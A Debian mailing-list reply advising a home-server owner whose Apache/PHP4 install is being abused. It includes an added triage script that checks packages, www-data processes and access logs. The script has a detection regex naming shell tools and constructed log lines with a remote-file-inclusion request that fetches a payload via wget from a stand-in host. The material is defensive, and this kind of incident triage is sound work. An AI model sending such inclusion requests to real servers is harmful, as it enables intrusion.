
Re: security issues with apache!



Hello Petter

The proper list for security issues is debian-security. The address of this list is
in the CC. We can now leave debian-user and move our discussion to
debian-security.

This is quite a hole! I can't believe there's such a big spot in Apache / Sarge and we
haven't heard of it. Can you please share more details with us?

Give us your current package versions of apache (using dpkg -s, for example). If you
suspect the installation could be compromised, run a test on the checksums.

Your access logs could contain precious information. Have a look at them and post to
the list any significant parts (removing any IP/host address you don't want
published).

We still don't know what you use your apache for. Most of the problems come from
poor PHP scripts. What scripts/services are you running on this server?

Can you post a sample of your netstat output, your list of processes for user www-data, and a
sample of the files you find in your /tmp?


Regards,
Josep SERRANO
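As an added example (not part of Josep's or Petter's messages), the script below gathers the triage data Josep asks for in one go: package versions via dpkg -s, a checksum test via debsums, the live www-data process and socket state, the contents of /tmp and /var/tmp, and a grep over the Apache access log for the request shapes that typically make a poorly written PHP script fetch and run code from /tmp (a URL passed as a parameter, shell commands in the query string, references to /tmp). The package names, the regular expression and the sample log lines are assumptions for illustration; the log lines are constructed, not taken from Petter's server.

```shell
#!/bin/sh
# Triage helper for a suspected compromise through Apache/PHP on Debian Sarge.
# Added example, not from the original thread. Package names are assumptions;
# dpkg, debsums, ps and netstat are used with their standard options.

# 1. Installed versions, and whether installed files still match the package md5sums.
#    debsums only helps if the attacker could not alter the stored md5sums (i.e. is not root).
package_state() {
    for p in apache apache-common php4 libapache-mod-php4; do
        dpkg -s "$p" 2>/dev/null | grep -E '^(Package|Version|Status):'
    done
    if command -v debsums >/dev/null 2>&1; then
        debsums -s apache apache-common php4 libapache-mod-php4 2>&1
    fi
    return 0
}

# 2. What www-data is doing right now: processes, sockets (netstat -p shows the
#    owning PID/program) and the scratch directories the payloads are dropped in.
live_state() {
    ps -u www-data -o pid,ppid,etime,args
    netstat -tunap 2>/dev/null | grep -E 'www-data|apache' || true
    ls -la /tmp /var/tmp
}

# 3. Access-log lines that look like remote file inclusion or command injection:
#    - a parameter whose value is a URL (page=http://..., plain or %-encoded)
#    - shell command names following ?, &, ; or %3b
#    - any mention of /tmp or /var/tmp
SUSPICIOUS_RE='(\?|&)[a-z_]+=(https?|ftp)(://|%3a%2f%2f)|(\?|&|;|%3b)(cmd|wget|curl|lynx|perl|chmod|uname|id)[=%+ ]|/(var/)?tmp/'

suspicious_requests() {   # $1 = access log file
    grep -E -i "$SUSPICIOUS_RE" "$1"
}

count_suspicious() {      # number of matching lines, for a quick summary
    grep -E -i -c "$SUSPICIOUS_RE" "$1"
}

attacker_ips() {          # distinct client addresses behind the matching lines
    suspicious_requests "$1" | awk '{ print $1 }' | sort -u
}

# Constructed sample in Apache combined log format (documentation IP ranges),
# so the log scan can be tried without a real server.
write_sample_log() {      # $1 = destination file
    cat > "$1" <<'EOF'
192.0.2.10 - - [12/Mar/2006:03:14:07 +0100] "GET /index.php?page=about HTTP/1.1" 200 2345 "-" "Mozilla/4.0"
198.51.100.7 - - [12/Mar/2006:03:15:22 +0100] "GET /index.php?page=http://203.0.113.5/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.79"
198.51.100.7 - - [12/Mar/2006:03:15:30 +0100] "GET /index.php?page=http://203.0.113.5/cmd.txt?&cmd=cd%20/tmp;wget%20http://203.0.113.5/scan.tgz HTTP/1.1" 200 128 "-" "libwww-perl/5.79"
192.0.2.11 - - [12/Mar/2006:03:16:01 +0100] "GET /images/logo.png HTTP/1.1" 200 8123 "http://example.org/" "Mozilla/5.0"
EOF
}

# Usage: triage.sh /var/log/apache/access.log   (log scan only)
#        triage.sh --live /var/log/apache/access.log   (also package and process state)
if [ "$#" -gt 0 ]; then
    if [ "$1" = "--live" ]; then
        shift
        package_state
        live_state
    fi
    if [ -n "$1" ]; then
        echo "suspicious requests: $(count_suspicious "$1")"
        echo "source addresses:"
        attacker_ips "$1"
        suspicious_requests "$1"
    fi
fi
```

On the constructed sample, two of the four lines match and both come from 198.51.100.7; the `page=http://...` shape is the classic remote file inclusion against a PHP `include($page)`, and the follow-up `cmd=cd /tmp;wget ...` is exactly how the portscanners Petter finds in /tmp get there. The pattern is deliberately broad (a legitimate script that takes a URL parameter will also match), so treat the output as a shortlist to read by hand, not as a verdict. Sanitise addresses before posting any of it to the list.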


> Hi
>
> I'm not completely new to Debian or Linux, but I wouldn't classify
> myself as a battle-scarred sysadmin just yet :)
>
> Anyways. My problem is security-related, and I hope that I'm posting to
> the correct list as well as hoping that someone can help me out here.
>
> Recently I've noticed that my Apache installation gets violated and that
> an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
> makes Apache execute these. Unfortunately these are some rather nasty
> things, mostly portscanners and bruteforce-attacks. They are all easily
> detected with netstat, and at least once a day I have to go in and kill
> the processes spawned by www-data (the user that runs Apache) as well as
> delete the offending files.
>
> Now, like I said - I'm not a pro, I'm trying to learn by doing.
> Unfortunately how this happens is way over my experience, and now I
> could really use some help in fixing this leak. I've narrowed it down to
> Apache only, but I have no clue as to how to seal the leak. I'm running
> a small server in my home using (mostly) Debian Sarge. This is a real
> Frankenstein-machine as it was originally a Woody-box, but it's been
> upgraded with bits from all over. It's been running pretty much
> constantly for three years. Of course I apply security fixes when they
> arrive, but I don't know if the source of these intrusions is Apache or
> just that I have managed to fubar some setting somewhere, allowing an
> attacker to make Apache execute code.
>
> Essentially the machine is Debian Sarge, with MySQL and PHP4. There are
> other services running on it, but I've noticed that the
> intrusions/code-executions only happen through Apache. MySQL only
> listens on localhost and accepts no connections from the outside. Hence,
> I hope that this is limited to Apache. Apache is 1.3.x, MySQL 4.0.24 and
> PHP 4.3.
>
> I deeply appreciate any help that can make me seal this leak! Thank you
> all in advance!
>
> /petter senften
>


